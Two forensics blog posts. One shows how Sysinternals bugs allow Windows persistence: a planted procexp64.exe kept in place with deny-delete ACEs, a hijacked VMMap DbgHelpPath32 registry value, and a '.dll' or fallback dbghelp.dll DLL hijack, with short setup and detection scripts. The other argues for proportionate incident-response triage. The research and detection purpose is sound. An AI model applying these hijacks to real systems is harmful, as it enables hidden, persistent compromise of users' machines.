
Beyond good ol’ Run key, Part 19

December 4, 2014 in Anti-Forensics, Autostart (Persistence), Compromise Detection, Forensic Analysis, Malware Analysis

In my last post I mentioned Sysinternals. While compiling the information for that post I came across a few things that gave me enough material to write part #19 of the series.

And it’s based on bugs in Sysinternals’ tools – bugs that can be spotted easily. Today I’ll explain how you can utilize these bugs to create new persistence mechanisms.

Say, you like Process Explorer.

Nowadays 64-bit systems are very popular, so running procexp.exe on a 64-bit system ends up with procexp.exe dropping its 64-bit version (procexp64.exe) into the %TEMP% folder and launching it.


Now, what you can do is, for example, copy your notepad.exe to %TEMP% and name it procexp64.exe. Then you need to set up two access rights for Everyone (a quick sketch follows the list below):

  • One that forbids deleting %temp%\procexp64.exe (set on the file itself)
  • One that forbids deleting subfolders and files inside %TEMP% (set on the %TEMP% folder); this is, by the way, one of the WTFs of the NTFS permission model, where prohibiting deletion of a file has to be extended to its parent folder; there must be some reason for it, but it is not something you can learn from the cryptic Security Properties tab
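
A minimal sketch of those two deny ACEs, using icacls (the Everyone group is referenced by its well-known SID S-1-1-0 to stay locale-independent; the use of Python and the exact commands here are just for illustration):

```python
import os
import subprocess

# Illustration only: add two "deny" ACEs so that procexp.exe cannot
# clean up the planted %TEMP%\procexp64.exe on exit.
temp = os.environ["TEMP"]
planted = os.path.join(temp, "procexp64.exe")

# 1) Deny "delete" (DE) on the planted file itself, for Everyone (S-1-1-0).
subprocess.run(["icacls", planted, "/deny", "*S-1-1-0:(DE)"], check=True)

# 2) Deny "delete subfolders and files" (DC) on the %TEMP% folder -- the NTFS
#    quirk mentioned above: deleting a file is also governed by its parent
#    folder's ACL.
subprocess.run(["icacls", temp, "/deny", "*S-1-1-0:(DC)"], check=True)
```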

From now on, launching procexp.exe on a 64-bit system will always launch notepad.exe instead. A nice man-in-the-middle attack, especially if the malicious notepad.exe actually does spawn the legitimate procexp64.exe and somehow hides its presence from the Process Explorer GUI.

Of course blocking %TEMP% from deletion is a silly idea, but:

  • it is an example only
  • it actually works
  • there are many other ways to prevent deletion of procexp64.exe by procexp.exe (on exit), or at least to ensure the malicious procexp64.exe is restored after it is deleted

Another bug I spotted was the way vmmap.exe craves dbghelp.dll.

VMMAP is not a very popular program and I bet not too many people use it daily, but the way it works deserves special attention; it’s an example of the difference between programming for your own use vs. programming for the ‘public’. As a non-professional programmer who writes buggy programs every day, I am actually quite surprised by it. Yes, it’s that buggy.

Let me elaborate.

VMMAP has a very peculiar way of searching for dbghelp.dll:

First, it searches for the entry in the Registry:

  • HKCU\Software\Sysinternals\VMMap\DbgHelpPath32 = <path to dbghelp.dll>
  • #persistence #1
    • By modifying HKCU\Software\Sysinternals\VMMap\DbgHelpPath32 to point to a malicious DLL we can ensure that DLL is loaded every time VMMAP is launched (see the sketch below)
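
To make persistence #1 concrete, here is a tiny sketch using Python’s winreg module; the DLL path is a made-up example, and the read-back at the end doubles as a quick audit of the value:

```python
import winreg

# Illustration only: the DLL path below is hypothetical.
EVIL_DLL = r"C:\Users\Public\dbghelp_evil.dll"

# Plant the value VMMAP reads on startup (persistence #1).
key = winreg.CreateKey(winreg.HKEY_CURRENT_USER, r"Software\Sysinternals\VMMap")
winreg.SetValueEx(key, "DbgHelpPath32", 0, winreg.REG_SZ, EVIL_DLL)
winreg.CloseKey(key)

# Defenders can audit the same value: anything that does not point to a
# known-good dbghelp.dll deserves a closer look.
with winreg.OpenKey(winreg.HKEY_CURRENT_USER, r"Software\Sysinternals\VMMap") as k:
    print(winreg.QueryValueEx(k, "DbgHelpPath32"))
```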

If it is not found, VMMAP goes ballistic (#persistence #2..N).

It calls LoadLibraryW with a NULL argument, which is (sort of) the result of retrieving data from the non-existent HKCU\Software\Sysinternals\VMMap\DbgHelpPath32 value.

This is when things get crazy. The craving goes totally addictive.

NULL is a Pandora’s box (or Pandor’s, since the author is a male) opened for LoadLibraryW.

It means it will walk through every directory listed in the PATH environment variable and will attempt to load a library called ‘.dll’ from every single directory on that list.

Yes, ‘.dll’ is a valid library name, i.e. a NULL name with a ‘.dll’ extension appended.

So, you can place a DLL called “.dll” in any location listed in the PATH environment variable and it will be loaded by VMMAP any time it starts.
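
A cheap detection sweep for this trick is to walk the PATH directories and flag any file literally named ‘.dll’ – a minimal sketch (Python chosen purely for illustration):

```python
import os

# Flag any library literally named ".dll" sitting in a PATH directory --
# exactly the kind of file the LoadLibraryW behaviour described above
# would end up loading.
for directory in filter(None, os.environ.get("PATH", "").split(os.pathsep)):
    candidate = os.path.join(directory, ".dll")
    if os.path.isfile(candidate):
        print(f"Suspicious planted library: {candidate}")
```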

You probably want to hear that this is the end of the story.

Not quite so.

There are still a few places to look at:

  • C:\Program Files\Debugging Tools for Windows (x86)\dbghelp.dll
  • C:\Program Files\Debugging Tools for Windows\dbghelp.dll
  • C:\Debuggers\dbghelp.dll

Dropping a dbghelp.dll in the …

yawnz…

you know the drill :)
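
Since you know the drill, a correspondingly boring check of those three hard-coded fallback locations (again, just a sketch; on a box with no debugging tools installed, any hit deserves a closer look):

```python
import os

# The hard-coded fallback locations VMMAP tries for dbghelp.dll (see the list above).
FALLBACK_PATHS = [
    r"C:\Program Files\Debugging Tools for Windows (x86)\dbghelp.dll",
    r"C:\Program Files\Debugging Tools for Windows\dbghelp.dll",
    r"C:\Debuggers\dbghelp.dll",
]

for path in FALLBACK_PATHS:
    if os.path.isfile(path):
        print(f"dbghelp.dll present at fallback location: {path}")
```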

The 3 stages of 3ages

November 27, 2014 in Compromise Detection, Malware Analysis, Preaching

Quick Update

Just to clarify: this is a critique of IR processes that rely on a single way of doing things which, in certain circumstances, is not the best; it may slow down your response time & give you a lot of unnecessary work. In other words: the Alexiou principle (see below) is a good way of doing things. Doing full or raw forensics on the example 400 hosts would be very inefficient. This mainly applies to daily IR/SOC work, not consulting gigs.

Original Post

The Digital Forensics world is subject to trends the same way fashion is.

A long time ago everyone would just do bit-by-bit & offline forensics and that would be enough. Then the ‘do not pull the plug’ idea came along and now no one dares to shut down the box until at least the volatile data is acquired. On the shoulders of the importance of volatile data came the notion of the importance of memory forensics, which culminated (as of 2014) in the phenomenal work of the Volatility team: an excellent tool and the best book about ‘all of it’, presented in the most digestible way ever.

Somewhere in the background a lot of research towards understanding the internals of NTFS was also done; it then got digested by many, and finally converted into popular, often free applications. It’s actually a good time to be in DFIR because the tools are out there and you can crack cases in no time. On top of that, both memory and NTFS/$MFT forensics are probably the most attractive technical aspects of the DFIR world in general, due to the technical difficulties associated with their ever-changing complexity &, simply speaking, ‘it really takes time getting to understand how it all works, but it is very rewarding’ (c).

What could possibly go wrong?

The everlasting and omnipresent part of DFIR work is the word ‘context’, a.k.a. scope (if you come from the consulting or compliance world).

One thing I have observed over the last few years is a very strange trend, which can be formulated as:

  • triage is now equal to memory & $MFT forensics.

If you can do it quickly, have the proper tools, and know what you are doing – it may actually work.

BUT

I believe that it’s often an over-engineered solution to a much simpler problem.

Context is REALLY important. And it dictates what you do and how you do it. And I believe that the context is always driven by the character of the investigation.

Let’s make an attempt to describe the various ‘levels’ of depth one can reach while doing DFIR work. It all depends on… yes, you guessed it – context (or scope).

  • Law Enforcement engaged / Criminal case
    • Full blown forensics with a major stress on accountability/logs/notes, chain of custody; and applied to every possible device you can find on the crime scene
    • Almost always goes to court, or the possibility is pretty high
    • You are SUPERCAREFUL, because everything you do is going to be shown to law interpreters [a.k.a. lawyers :)]
    • You use a very specific, self-protective language to describe your findings
  • Confirmed compromise with more than one aspect of C.I.A. triad being affected (e.g. PCI space, hacking cases)
    • Almost identical to the above case, with one extra bit – full forensics for the scoped systems + raw or light forensics in the ‘close neighborhood’
    • Surprisingly, it does not go to court that often, but sometimes it does. Whatever you do – do it with the assumption that it WILL go to court one day. So you are still VERY CAREFUL, and take care of the chain of custody and statements
    • You also use a very specific, self-protective language to describe your findings
  • Day to day work on the IR/SOC team
    • Your role is to keep the company secure and literally speaking: find & close incidents
    • Usually you do light forensics for all systems
    • Only, and only if, a deeper intrusion is confirmed do you move to raw/full forensics

Same as in school, this is all about grades.

Just to be precise here: I have used some terms above which require further explanation:

  • light forensics – focus on data that is ‘easy’ to acquire with OS-only tools and with minimal impact on the system (minimal contamination) – this is not your memory forensics/$MFT analysis yet; it is AV logs, “dir /a/s c: > evidence.txt”, “powershell gong foo”, “netstat”, “wmic /xyz/” variations, maybe later on autoruns and Sysinternals tools, etc., + copying it all over to your box for further analysis (see the sketch after this list)
  • raw forensics – maybe there is a better name; if your light forensics didn’t detect anything and you suspect you need more – this is the time when you need to go deeper; the natural progression is to look at $MFT and memory
  • full forensics – nothing to add, cuz there is nothing to remove; you go de Saint-Exupérian a.k.a. ballistic on this one & analyze everything & analyze it twice
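
For the light-forensics bullet above, here is a minimal, illustrative collection sketch; the output folder and file names are my own choice, and the commands are the OS-only ones mentioned in the list:

```python
import subprocess
from pathlib import Path

# Illustration only: grab a few "cheap" artefacts with OS-built-in tools
# and keep the output for offline review.
OUT = Path(r"C:\triage")          # hypothetical collection folder
OUT.mkdir(parents=True, exist_ok=True)

COMMANDS = {
    "filelist.txt":  "dir /a /s c:\\",
    "netstat.txt":   "netstat -ano",
    "processes.txt": "wmic process list full",
}

for name, cmd in COMMANDS.items():
    with open(OUT / name, "w", errors="replace") as handle:
        # shell=True because 'dir' is a cmd.exe built-in, not a standalone binary
        subprocess.run(cmd, shell=True, stdout=handle, stderr=subprocess.DEVNULL)
```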

The conclusion is this:

  • In a typical IR scenario, utilizing tools that are adequate for your task/role is very important
  • You do a MINIMUM first
  • Only, and only if it doesn’t deliver and you suspect you need to go deeper – then you go deeper; $MFT and volatile data can wait
  • In C.I.A. breaches you’d better do EVERYTHING you can think of

And to add some real-world case scenarios here: when I worked for a bank, we would sometimes have 400 infections in one go.

<rant>Thank you, Java & the Enterprise Solutions software market. You suck big time. There needs to be an audit in every financial institution, or any large organization really, to weed out the enterprise parasites harvesting gazillions of dollars in consulting hours and producing terrible, really unforgivable, program-wannabe pieces of executable code. That is CRAP.</rant>

Back to our topic. Employing full, or even raw, forensics doesn’t make sense ALL THE TIME. All you have to do is get a process list and a file list, kill the bad process, remove the drive-by exploit, reboot the system, and verify all is good after the reboot.

No $MFT, no memory analysis. No full forensics.

Think of the Alexiou principle:
1. What question are you trying to answer?
2. What data do you need to answer that question?
3. How do you extract that data?
4. What does that data tell you?